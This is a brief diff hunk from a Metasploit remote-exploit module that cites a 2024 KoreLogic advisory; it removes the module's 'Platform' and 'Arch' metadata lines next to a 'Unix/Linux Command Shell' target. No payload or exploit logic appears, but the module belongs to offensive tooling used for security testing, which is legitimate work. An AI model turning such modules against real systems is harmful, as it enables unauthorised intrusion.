@@ -31,8 +31,6 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://korelogic.com/Resources/Advisories/KL-001-2024-012.txt']
         ],
         'DisclosureDate' => '2024-09-10',
-        'Platform' => %w[unix linux],
-        'Arch' => [ARCH_CMD],
         'Targets' => [
           [
             'Unix/Linux Command Shell', {
